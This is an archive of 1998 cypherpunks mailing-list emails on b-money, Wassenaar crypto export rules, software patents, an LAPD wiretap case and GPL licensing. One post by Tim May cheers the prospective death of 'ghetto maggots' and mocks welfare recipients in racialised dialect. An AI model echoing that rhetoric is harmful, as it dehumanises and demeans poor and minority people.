From: Wei Dai <weidai@eskimo.com>
Date: Tue, 8 Dec 1998 08:12:21 +0800
To: Adam Back <cypherpunks@cyberpass.net
Subject: Re: Wei Dei's "b-money" protocol
In-Reply-To: <199812051937.TAA12780@server.eternity.org>
Message-ID: <19981207152017.A29919@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Dec 06, 1998 at 12:08:04AM +0000, Adam Back wrote:
> (2) Borrowing resources -- a student with access to a campus full of
> workstations can obtain quite a bit of free CPU time.

If a problem can be solved on a network of computers for free, then by
definition broadcasting the solution to that problem won't create any
money. B-money mints will need to solve problems that can't be
parallelized well on low-bandwidth networks in order to prove that they're
not using free idle time of network computers. I'm not sure if such a
problem class exists, however. I think this problem will probably become
less serious in the future as people discover more productive uses of idle
computer time.

> (7) If such a system took off there seems to be an overhead equivalent
> to the value of b-money in circulation which over time has essentially
> been burnt off in disipated heat, and useless hardware.  But probably
> the cost is still much lower than the enormous costs involved in
> maintaining a force monopoly to enforce traceable transactions.

I now tend to think that the government monopoly of force is a net
benefit. If you look at countries where the government doesn't have a
monopoly of force (like Russia) things look pretty bleak.

Anyway, back on topic. The resource waste in creating b-money can be
reduced if we assume that b-money will be created gradually as the b-money
economy expands rather than all at once at the beginning. If we build a
deflation factor into b-money, b-money will be worth more over time and
therefore not as much b-money will be needed to support the operation of
the economy. This can be accomplished by specifying that the standard
basket used to define the creation of b-money grow at a fixed rate over
time. But of course deflation also has costs since it makes comparing
prices across time more difficult. 

I think b-money will at most be a niche currency/contract enforcement
mechanism, serving those who don't want to or can't use government
sponsored ones. However if it did become mainstream I think there are some
interesting macroeconomic questions here. Will prices really be stable as
they're designed to be? Will there be business cycles? What is the optimum
inflation/deflation rate?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Tue, 8 Dec 1998 02:07:54 +0800
To: cypherpunks@cyberpass.net
Subject: RE: tyranny of corporations (was: Corporate Nations)
Message-ID: <3.0.3.32.19981207161424.006ae900@209.204.247.83>
MIME-Version: 1.0
Content-Type: text/enriched

 >>>>
From: "Blanc"  


Also, this image of hyperindividualism doesn't seem right.  I would think such an extreme degree of individualism would exclude much involvement with others, meaning they could not run corporations, because for a business to exist requires involvement in providing a service/product to the largest numbers of the population as possible,  and they can only do this if this large mass of people see the value of, and accept, in preference to the offerings of the competition, what that particular corporation offers.  
  
I imagine a hyperindividual more as an independent contractor working "alone".

There are dozens of examples of the Executive that comes to a new position, cuts jobs and makes other changes that make the bottom line look good in the short term. Since the sales of a very large company are not likely to "crash", this person looks good for a couple of years, then hops to a new job and the next guy catches the fallout of the short-term vision. 

The independent contractor on the other hand will probably never have the sales base to get away with screwing over his/her employees and clients. The independent contractor, that is not an out and out criminal, generally has to be very careful not to alienate the customers. A big corporation on the other hand can afford to lose a few thousand customers without too much trouble. A scoundrel has a much better chance of fucking over people in his/her rise to the top in a corporation than in a small company. 

The fly-by-night companies that are obviously rip-offs are not quite the same thing since very few people aspire to be like these folks. But the original authors point is correct in that a very large part of the population want to be able to emulate the big time self-interest seekers.

APF


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 8 Dec 1998 06:15:31 +0800
To: "'Robert Hettinga'" <cypherpunks@cyberpass.net
Subject: RE: y2k/gary north delusions
Message-ID: <D104150098E6D111B7830000F8D90AE84DDFB8@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



Sure he did. However, geography was not
accomodating, and there is at least one
point where a major aqueduct is pumped
over a ridge. 

Peter


> -----Original Message-----
> From:	Robert Hettinga [SMTP:rah@shipwright.com]
> At 11:07 AM -0500 on 12/7/98, Trei, Peter wrote:
> > I suspect that Los Angeles, and other cities
> > which have grown recently in arid areas, would
> > have a lot more trouble.
> 
> Actually, Mulholland knew what gravity was, as well. :-).
> 
> Cheers,
> Robert Hettinga
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Dec 1998 09:16:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Vengeance Libertarianism
In-Reply-To: <3.0.3.32.19981205220239.006a17c8@209.204.247.83>
Message-ID: <v03130334b2921ff51dd6@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:36 AM -0800 12/7/98, Declan McCullagh wrote:
>Many libertarians would not object if local state law punished rapists or
>burglars by sending them to prison with labor requirements.
>
>So if it is an acceptable punishment in principle, the question then
>becomes who should qualify.
>
>The problem with Tim's analysis is that if we extend the punishment to
>anyone who's benefited from government tax-n-spending that libertarians
>oppose, it's hard to find anyone *not* to put in the workcamp. Anyone who
>takes advantage of public transportation (like the Metro here in DC), or
>federally-funded interstates, etc. could conceivably qualify. And what
>about all those folks with unconstitutional federal student loans?

Recall that I said I expected them to pay back what they took, with
compounded interest. Only if they could not arrange a payback plan would
their labor then be used.

And surely credit would be given for what was taken out in other forms.
Their indebtedness would be their benefits minus what they paid in.

Thus, while I may be benefitting to the tune of, say, $2000 a year in the
minimal services I ever use, the filling of potholes, etc., I am paying
upwards of <many times this> in federal, state, local, property, energy,
sales, and other taxes. (I won't say what my taxes are, especially as they
fluctuate wildly depending on financial transactions I've made, but they
are vastly, vastly greater than any minimal benefits I get from government
at any level.)

This calculus applies at all levels.

My point is not so much to propose that such a scheme actually be deployed,
but to explain how some of us don't buy the "let's let bygones be bygones"
approach. And why some of us will cheer when millions of ghetto maggots die
in the firestorms of social chaos we expect.



>And fundamental fairness principles suggest that punishment should not be
>limited to welfare for individuals. Why shouldn't corporate welfare qualify?
>
>Tim owns substantial shares of Intel Corp. stock, and Intel is a prime
>beneficiary of corporate welfare. Check out last month's Time magazine
>cover story at: http://www.time.com/magazine
>
>Should just the directors of Intel, or also the shareholder owners be
>punished?

This is disingenuous nonsense, Declan! While there is little doubt that
Intel, like all other large corporations, finds itself backed into these
kinds of kickbacks (tax rebates, special education bonds, worker training
reimbursements, etc.), these programs are unavoidable. And Intel most
definitely pays more into the government than it ever gets out.

So the city of Rio Rancho, NM, for example, offers to cut taxes for Intel
for X years if Intel expands a plant. And so on. Is the promise to reduce
robbery a benefit?

(Especially considering what Intel is shelling out in taxes, employee
salaries which are taxed at 39%, Social Security payroll taxes, etc.)

And so on. No one could make an argument that when a Grand Accounting is
done, that Intel has taken in more money from the government than it has
paid into the government.

(I could go on about Intel, and how it repeatedly turned down government
contracts, and how it refused to participate for the longest time in
government-sponsored research...until eventually the beancounters said that
the company was being taxed to death and might as well get _some_ of its
money back....)




>A more moderate approach that seems more logically consistent might be to
>limit punishment to state actors and agents (assuming you agree with this
>concept of vengeance to begin with). There's a big difference between an
>FBI agent engaging in what he might occasionally suspect to be
>unconstitutional searches and busts and someone who picks up an occasional
>unemployment check.

Amount received from government - amount paid to government = Indebtedness

(All calculated with normal accounting procedures, including the
appropriate time value of money, interest rates, etc.)

For most of us, Indebtedness = a negative number. We have paid in more than
we have gotten back, by essentially any accounting of values.

For those who have been collecting food stamps, welfare, AFDC, WICC,
disability, etc. their entire lives, indebtedness = $1.3 million, or
suchlike.

Better get to moppin' dem floors, Levonda!

And if they won't work to pay off their debts, let them begin starving
immediately.


--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>Dan_Tebbutt@acp.com.au
Date: Mon, 7 Dec 1998 21:16:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: AU WassenaarWassenaar changes
Message-ID: <199812071243.HAA12590@smtp2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain




[OK to repost to crypto lists and Cryptome - dant]

I spoke this afternoon with one of the Australian delegates at the
Wassenaar meeting, an official from the Dept of Foreign Affairs and Trade
(DFAT).

Speaking off the record, they confirmed the changes at Wassenaar are pretty
much as we know already:
     - NEW CONTROLS on mass market crypto products (hardware and software);
     - DEREGULATING all weak encryption products using key lengths up to 56
     bits;
     - EXEMPTING mass market software where the key length is 64 bits or
     less;
     - EXTENDING the same mass market exemption to hardware for the first
     time;
     - EXCLUDING encryption products that protect intellectual property,
     such as digital watermarking;
     - NO DECISION was made about regulating 'intangible' distribution of
     technology, including Internet downloads.

Apparently in the short term the intangibles issue is being considered in
other fora (including the Nuclear Suppliers Group (NSG) which includes
Australia thanks to Filthy Jabilucre et al).

It is still not clear whether the new restrictions are intended to stop
public domain software such as PGP*. The DFAT contact said there was no
discussion about an intention to stop public domain packages like PGP. They
did not think public domain was being restricted. Yet apparently the
Australian DoD has expressed the David Aaron view that public domain is
subject to the same restrictions as mass market.

* PGP is "in the public domain" for the purposes of Wassenaar/DSGL, since
the definition states:
     "in the public domain" (GTN NTN GSN), as it applies herein, means
     "technology" or "software" which has been made available without
     restrictions upon its further dissemination (copyright restrictions do
     not remove "technology" or "software" from being "in the public
     domain")

Note: there is no equivalent definition for "mass market", but the General
Software Note (GSN) states it thus:
     Generally available to the public by being:
        1. Sold from stock at retail selling points, without restriction,
        by means of:
          a. Over-the-counter transactions;
          b. Mail order transactions; or
          c. Telephone order transactions; and
        2. Designed for installation by the user without substantial
        support by the supplier;

Dan
=====
Dan Tebbutt, Technology Journalist, Melbourne Australia
Australian Personal Computer (http://www.apcmag.com)
LAN Corporate IT (http://www.lanlive.com)
The Australian (http://www.newsit.com.au)
Ph: +61-3-9347-8893 Fax:+61-2-9264-6320
Email: dant@acp.com.au
"The revolution will be televised ... on pay-per-view."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian BROWN <I.Brown@cs.ucl.ac.uk>
Date: Tue, 8 Dec 1998 01:59:22 +0800
To: Phillip Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <000e01be200d$d7be9e10$8007a8c0@russell.internal>
Message-ID: <24416.913050208@cs.ucl.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Phillip Hallam-Baker wrote:
>In addition under the single European act the entire country of Europe is
>one export zone for crypto control purposes.

Unfortunately, not yet. The European Commission has proposed amending the 
Dual-Use regulations to allow the free circulation of crypto products among 
member states, while extending controls to 'intangible' goods (i.e. Internet 
downloads). Until then an export license is required. Licenses are granted 
more readily and with fewer conditions (e.g. permitted end uses) for exports 
to other EU nations and Australia, Canada, Japan, New Zealand, Norway, 
Switzerland and the US.

Amazing the minutiae you have to trawl when co-authoring a paper on crypto 
export controls ;)

Ian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 07:17:38 +0800
To: cryptography@c2.net
Subject: Wassenaar and the dumming of New Zealand
Message-ID: <v04020a30b29202ace2da@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Blair Anderson" <blair@technologist.com>
To: "Robert Hettinga" <rah@shipwright.com>
Date: Tue, 08 Dec 98 10:13:56 +1300
Reply-To: "Blair Anderson" <blair@technologist.com>
Priority: Normal
MIME-Version: 1.0
Subject: Wassenaar and the dumming of New Zealand


See Peter Gutmens contribution at
 http://www.cs.auckland.ac.nz/~pgut001/policy/.

NZ's very peculiar interpretation of Wassenaar
"Export Control Myths and Facts",
http://www.cs.auckland.ac.nz/~pgut001/policy/myths.html.

Its a rich source of matter on the subject.

Cheers

Blair Anderson  (Blair@technologist.com)

International Consultant in Electronic Commerce, Encryption and Electronic
Rights Management

   "Techno Junk and Grey Matter"
   50 Wainoni Road, Christchurch, New Zealand

          phone 64 3 3894065
          fax     64 3 3894065

Member 	Digital Commerce Society of Boston, Computer Professionals for
Social Responsibility,

---------------------------- Caught in the Net for 25 years
----------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Dec 1998 07:47:29 +0800
To: cypherpunks@cyberpass.net
Subject: DCSB: Ira Heffan and Mike Schmelzer; "Software Patents" and Digital Commerce
Message-ID: <v04020a31b29203971a2a@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
X-Sender: rah@pop.sneaker.net
Date: Mon, 7 Dec 1998 13:02:59 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Ira Heffan and Mike Schmelzer; "Software Patents" and
 Digital Commerce
Cc: Ira Heffan <heffan@tht.com>, Mike Schmelzer <schmelze@tht.com>,
        Roland Mueller <roland@secunet.com>,
        "Jonathan J. Rusch" <rusch1@erols.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


          The Digital Commerce Society of Boston

                       Presents

              Ira Heffan and Mike Schmelzer
             Testa, Hurwitz & Thibeault, LLP

         "Software Patents" and Digital Commerce



                Tuesday, January 5th, 1999
                       12 - 2 PM
             The Downtown Harvard Club of Boston
               One Federal Street, Boston, MA



Although the very idea of patenting software seems to be an anathema to much
of the programming community, patents on software continue to stream out of
the U.S. Patent Office.  Everyone involved in digital commerce applications,
which are by definition software-based, probably has heard about recent
events:  The Court of Appeals for the Federal Circuit decided "State Street
Bank & Trust Co. v. Signature Financial Group," which explicitly ratified
patenting methods of doing business, and a spate of well-publicized patents
have issued claiming to cover such concepts as the virtual shopping cart and
the reverse auction.  As a prerequisite to discussing these recent
developments, the first part of our talk will provide an introduction to
patents.  We will explain what patents are and what they are not, and
describe the business goals that a patent can serve.  Then we will talk
about current events, and attempt to  put the _State Street_ case in
context.  We will present a survey of recently-issued patents (suggestions
welcome) related to digital commerce, and conclude with some speculation
about current trends, including a novel form of software patent with
potentially huge implications.

Ira Heffan (heffan@tht.com) and Mike Schmelzer (schmelze@tht.com) are patent
attorneys at Testa, Hurwitz & Thibeault, LLP (http://www.tht.com).  We will
be presenting our own personal views on this topic, and not the views of
Testa, Hurwitz & Thibeault, LLP or its clients.


This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, January 5, 1999, from 12pm - 2pm at the Downtown Branch of
the Harvard Club of Boston, on One Federal Street. The price for lunch
is $32.50. This price includes lunch, room rental, various A/V hardware,
and the speakers' lunch.  The Harvard Club *does* have dress code:
jackets and ties for men (and no sneakers or jeans), and "appropriate
business attire" (whatever that means), for women.  Fair warning: since
we purchase these luncheons in advance, we will be unable to refund the
price of your lunch if the Club finds you in violation of the dress
code.


We need to receive a company check, or money order, (or, if we
*really* know you, a personal check) payable to "The Harvard Club of
Boston", by Saturday, January 2nd, or you won't be on the list for
lunch.  Checks payable to anyone else but The Harvard Club of Boston
will have to be sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The
Harvard Club of Boston", in the amount of $32.50. Please include your
e-mail address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements
(We've had to work with glacial A/P departments more than once, for
instance), please let us know via e-mail, and we'll see if we can work
something out.


Upcoming speakers for DCSB are:

February   Roland Mueller   European Privacy Directive
March      Jonathan Rusch   Internet Fraud

We are actively searching for future speakers.  If you are in Boston
on the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com>.


For more information about the Digital Commerce Society of Boston,
send "info dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> . If you want to subscribe to the DCSB e-mail
list, send "subscribe dcsb" in the body of a message to <mailto:
majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNmwX/8UCGwxmWcHhAQFfjgf+IBe01g9XCldZYT+GRDI5ho1sOPgL6W7q
zLDQToz0GGM/NZzv44SMTSGpDFx80R1yautvy4xHMnYQy2UnvO2WGsfrjuwSdQte
8qxoRAFkihyP/mi/83As2TwWdp6QhwbjI02hyP6elsdSzsspflwwonOB4I+8E/xX
UDsGdQH4AHaWrK1S5XYfJSHSRGOBpk2+cqboiGvbcbC1z0vDRGrnztf8GADoPVC3
6vw4M00f+cgIuoaqqO4ol62Os6D+WPVw2NMop20OD62EGzYO2pyQjboPvBLxyRD7
smLz/4S598uLZF0GX+GO/8rCjAORask/Qt3SFIU2HMMPj9nKIvVtJw==
=gz6w
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Tue, 8 Dec 1998 08:52:11 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: Wiretap Operation Sheds Light on LAPD Tactics
In-Reply-To: <199812072323.AAA32006@replay.com>
Message-ID: <199812072344.RAA29429@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> 
> 
> If it is Monday, December 7, 1998, you can go to
> http://www.latimes.com/HOME/NEWS/STATE/topstory.html and read about how
> Los Angeles police wiretapped a small cellular phone service provider
> because his policies were too helpful for drug dealers.  He didn't try
> hard enough to verify customer names, he sold cell phones with built in
> scramblers, he allowed customers to change phones and numbers easily.
> After years of investigation the company owners were never charged,
> but a number of their customers were convicted as drug dealers, in many
> cases never being told about the phone taps.
> 
> It's an ominous account of how privacy-friendly policies can be used by
> the police to justify an investigation.

I am curious if the whole provider was just a front for the law
enforcement.

igor

> If it's after December 7, read the story here:
> 
> :      Los Angeles narcotics officers spent a lot of time spying on John
> : Lopez and his small storefront telephone company--Atel Cellular
> :      Convinced he was in cahoots with drug dealers by selling secure,
> : cop-proof phone service--no questions asked--they staked out his
> : Downey office, tailed his customers and finally wiretapped the
> : customers' and Atel's phones.
> :      Starting with just his business lines and a handful of customers,
> : the operation spread like kudzu, eventually covering hundreds of
> : phones and thousands of conversations and becoming the largest wiretap
> : operation in the history of Los Angeles County.
> :      When the three-year probe ended in March, police had arrested
> : dozens of Atel's customers, but not Lopez or any of his employees.
> :      The Atel taps are at the center of the nine-month legal
> : controversy over whether prosecutors have been improperly concealing
> : their wiretapping operation and the information derived from it. Also
> : at issue are charges by defense lawyers representing Atel customers
> : that the allegations against Atel Cellular are a sham created to win
> : court orders permitting an electronic fishing expedition against their
> : clients.
> :      Manager Lopez and Atel's owner, Atil Nath, refused to
> : comment. Their lawyers say the two men are not involved in drugs.
> :      "The whole concept [of the police wiretap operation] was
> : preposterous," said Dale Hardeman, a Downey attorney. "How are we
> : supposed to know if customers are involved in criminal activity?"
> :      Details of the probe--revealed through interviews, police
> : affidavits, wire monitor logs and volumes of court records--provide a
> : fascinating inside look at how detectives can mold the legal actions
> : of a suspect into criminal scenarios and persuade judges to authorize
> : snooping on people's private conversations.
> :      The probe also raises broader questions, such as whether many of
> : the reasons given for tapping Atel could just as easily be applied to
> : other phone companies, and whether wiretaps should be allowed to
> : continue indefinitely, even when police work for months without
> : finding enough evidence to arrest the target.
> :      The 4th Amendment protects phone privacy.
> : 
> :      Need for Probable Cause
> : 
> :      To tap a phone, prosecutors have to get a court order by showing
> : they have sufficient reason, known as probable cause, to believe the
> : phone subscriber is committing crimes. Even if a subscriber's actions
> : are legal when considered individually, those actions can amount to
> : probable cause when viewed as part of a larger picture.
> :      If a tap provides a lead or evidence, prosecutors must reveal the
> : tap and give transcripts to the defendant before trial.
> :      Though the Atel investigation established strong suspicion among
> : investigators that Lopez knew he was dealing with drug traffickers, it
> : fell far short of proving it.  But police were getting a steady supply
> : of leads against his customers as well as new phone numbers of people
> : they considered suspicious. So they kept going back to court for
> : extensions and new taps.
> :      Police referred all questions about the case to prosecutors, who
> : defend the wiretap practice, saying they had sufficient evidence to
> : suspect Lopez of wrongdoing.
> :      Dist. Atty. Gil Garcetti noted in a prepared statement that the
> : operation had court approval. He said police targeted Atel because
> : they believed most of its business was providing phones to drug
> : dealers without requiring them to provide any personal information.
> :      Superior Court Judge John Ouderkirk, who approved most of the
> : orders, said he could not discuss pending cases.
> :      Not much is known about Lopez and Nath. Nath lives in a two-story
> : home in a neat, well-kept neighborhood in Downey. Lopez lives in Pico
> : Rivera with his wife, Maria, and their children. Both have said in
> : court papers that they have no criminal record. Their company is one
> : of about three dozen small phone companies in Los Angeles County that
> : resell or sublease service and equipment.
> :      Police say the closest they came to showing a direct connection
> : between Lopez and drugs was during a stakeout at his home when they
> : saw a man arrive in a pickup truck registered to a member of what they
> : say is a drug gang.
> :      The investigation grew out of, and, in many ways, was modeled
> : after a 1994 wiretap of Downey Communications, another small retailer
> : of phone services. As in the Atel probe, police staked out the
> : business and collected information for wiretap orders.
> :      During hours of surveillance, they watched customers arrive and
> : leave. They noticed the types of vehicles they drove. They even took
> : notes on their manner of dress, eventually deciding that silk floral
> : shirts, pressed denim, hand-stitched leather belts and expensive
> : cowboys boots were haute couture on the L.A. drug scene.
> :      Police claimed that Downey leased to drug dealers and was
> : "heavily involved in the sale and transportation of narcotics."
> : Officers would later use the same language in Atel affidavits.
> :      The Downey wiretaps lasted a year. They ended in drug and cash
> : seizures and 12 indictments, including one against the brother of
> : Downey's owner. But the owners and employees of Downey were not
> : arrested. The owner said in court papers he was never interviewed by
> : police, was not aware of the investigation and has never been charged
> : with a crime.
> :      Police used the Downey Communications probe as a springboard to
> : Atel.
> :      The connection was tenuous.  Downey and Atel customers shared the
> : same taste in cars and fashion.  Downey employees were seen paying
> : short visits to Delta Tri-Telesis, a now-defunct cellular phone
> : business owned by Nath and operated by Lopez.
> :      So in September 1995, officers turned their binoculars on Atel,
> : which had taken Delta's customers.  They often saw customers in cars
> : registered to targets of previous drug probes going to houses once
> : used as drug "stash" sites and employing what police considered
> : "counter-surveillance" driving.
> : 
> :      Reports on Surveillance
> : 
> :      Investigators say they saw Lopez use such techniques when they
> : were tailing him in May 1996, shortly before they started tapping his
> : business phones. They said they saw him on the freeway changing lanes
> : erratically and driving "at a high rate of speed in excess of 70 miles
> : per hour," later making a U-turn on Arrington Avenue and lingering too
> : long--three minutes--at an intersection.
> :      Police also noted in affidavits that Lopez sold money counters
> : and phone scramblers; that he apparently didn't care if customers gave
> : him fictitious names; that he let customers change numbers quickly and
> : easily.
> :      Drug suspects were frequently found with Atel phones.
> :      Police saw what they considered suspicious calling patterns--too
> : many calls in a short period of time--among groups of Atel customers.
> :      Although such evidence was far from enough to file charges
> : against Lopez and Nath, legal experts say it was sufficient as
> : probable cause for a court order, which was granted in May 1996 for 30
> : days.
> :      After a month of wiretapping, Garcetti's prosecutors--armed with
> : transcripts of tapped phone conversations--were back in court asking
> : for the first extension of the court order and for permission to tap
> : new telephone numbers. From then on, requests for extensions built on
> : previous ones. Police eventually received 19 extensions.
> :      Although the taps provided a mother lode of leads against drug
> : dealers, they seldom offered much evidence against Atel. There was one
> : conversation that police described in an affidavit as particularly
> : damning for Lopez. It was on June 25, 1996, from "Oscar," who had been
> : under police surveillance.
> :      "Hey John, this number is no good," Oscar tells Lopez.
> :      Lopez: Not good?
> :      Oscar: They're on me again!  Right behind.
> :      Lopez: OK, bring it in now!
> :      But most of Lopez's conversations in the affidavits simply
> : confirmed what police already knew: that customers dealt directly with
> : Lopez, that Lopez based billing records on phone numbers instead of
> : names and that he handled billing arrangements by phone.
> :      In contrast, the conversations among customers were
> : fruitful. Most were cryptic discussions about drug deals, pickup
> : locations, delivery times, police said. According to investigators,
> : they never mentioned drugs, using words such as "ladies," "stuff" or
> : simply a number understood to be an amount of drugs.
> :      For example, in June 1996, police overheard this exchange:
> :      Receiver: How do they look?
> :      Caller: Real good. How many do you have?
> :      Receiver: 40 plus 5 out, plus some lying around.
> :      Caller: OK. I'll hold whatever else I have.
> :      Without interpretation by detectives, there is little indication
> : that that conversation is about drugs.
> :      By the time the operation ended in March, police had tapped close
> : to 400 Atel phones.
> :      The wiretap controversy erupted that month because San Diego
> : attorney Philip DeMassa and two other lawyers discovered that the case
> : against their clients sprang from information garnered from the Atel
> : taps and handed off to other officers who were not told of the taps so
> : they would not have to reveal them to defense lawyers.  Later, Deputy
> : Public Defender Kathy Quant went to court for indigent defendants.
> :      Garcetti acknowledged in June that he withheld tap information in
> : 58 cases and he agreed to notify defendants about future taps.
> : Although a judge upheld the wiretap handoff practice last month, with
> : some qualifications, Quant is considering an appeal. Other defense
> : lawyers are challenging whether Garcetti has revealed all tap cases.
> :      Whatever the outcome, the probe clearly helped police arrest some
> : of Atel's customers. It netted large amounts of narcotics, about $8
> : million in drug proceeds and dozens of arrests.
> :      Lawyers base their doubts about the investigation of Nath and
> : Lopez partially on the fact that it lasted three years and police
> : never tried to interview them. In fact, DeMassa alleges in court
> : papers that Lopez and Nath are actually police informants or are
> : perhaps cooperating through a grant of immunity from prosecution, an
> : assertion prosecutors call absurd.
> :      DeMassa is hoping to show that police misled the courts when they
> : said they were investigating Lopez and Nath.
> :      If Nath and Lopez were such an integral part of a gigantic drug
> : trafficking operation, the police should be trying to protect the
> : public from them, he said.
> :      "Why isn't anything happening to these guys?" he said.
> : 
> :      Acts Were Not Illegal, Critics Say
> : 
> :      None of Atel's acts described in the affidavits was illegal,
> : Quant and other critics say.  Well-known phone companies engage in
> : many of the same practices, Quant said. If police use the same
> : standards elsewhere, any companies, especially small retailers, may be
> : vulnerable to taps.
> :      Many of the actions cited in Atel affidavits are suspicious only
> : in the eyes of police, Quant said.  Money counters are legitimate, and
> : other firms advertise "no eavesdropping" cell phones because
> : legitimate businesses need secure communications, she said.
> :      There is nothing suspicious, for example, about high usage of
> : cell phones, particularly among real estate agents, salespeople, even
> : news reporters, Quant said.  And other small retailers allow people to
> : change numbers frequently.
> :      Regardless of Atel's guilt or innocence, what police did to Atel
> : could be done to any legitimate businesses, she said.
> :      Deputy Dist. Atty. Robert Schirn dismissed that notion.
> :      "That's quite a stretch," he said.
> :      "Atel was a facilitator and made it possible for drug dealers to
> : break the law," he said.
> :      Yet Schirn acknowledged that he could not point to any conclusive
> : evidence that Nath and Lopez knew that some of their customers were
> : drug dealers.
> :      He said he didn't know if police tried to persuade defendants to
> : testify against Nath or Lopez.  Even if they did, prosecutors would
> : need more evidence than the tainted testimony of accomplices to make
> : an arrest, he said.
> :      As for Atel, Hardeman said his clients had no idea some of their
> : customers were criminals.
> :      "This investigation has virtually destroyed them," he said.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Dec 1998 08:25:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: linux-gpib licensing (fwd)
Message-ID: <199812080001.SAA07092@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From llp-owner@obelix.chemie.fu-berlin.de Mon Dec  7 17:59:05 1998
X-Authentication-Warning: obelix.chemie.fu-berlin.de: majordomo set sender to owner-llp using -f
Message-ID: <XFMail.981207090304.danny@holstein.tritonetd.com>
X-Mailer: XFMail 1.1 [p0] on Linux
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <Pine.SGI.3.91.981201222534.10972B-100000@bragg.chemie.fu-berlin.de>
Date: Mon, 07 Dec 1998 08:48:14 -0500 (EST)
From: "Danny G. Holstein" <danny@holstein.tritonetd.com>
To: Claus Schroeter <clausi@chemie.fu-berlin.de>
Subject: Re: linux-gpib licensing
Cc: llp@obelix.chemie.fu-berlin.de, James Minyard <jminyard@lanhopper.com>
Sender: owner-llp@obelix.chemie.fu-berlin.de
Precedence: bulk


On 01-Dec-98 Claus Schroeter wrote:
>On Tue, 1 Dec 1998, James Minyard wrote:
>
>> 
>> I was wondering if you would consider changing the license for the
>> libgpib portion of the linux-gpib distribution from GPL to LGPL.
>> 
I'd like to register my thoughts here.

I believe the best model to how the GPL can work is how Apache and IBM handled
it.  IBM wanted to include the server with a system, they were willing to pay
but there was no one to pay, in the end, they paid with the only currency that
would work, namely, IBM added some code to the Apache server and was allowed to
inlude it with their system.

Stick with GPL.  No one should be able to sell the work of another person as his
own, with GPL, one is assured that the cost of using a code is merely that of
returning improvements to the code.

   ...Dan
-------
To get more information on the Linux-Lab Project see:
http://www.llp.fu-berlin.de/




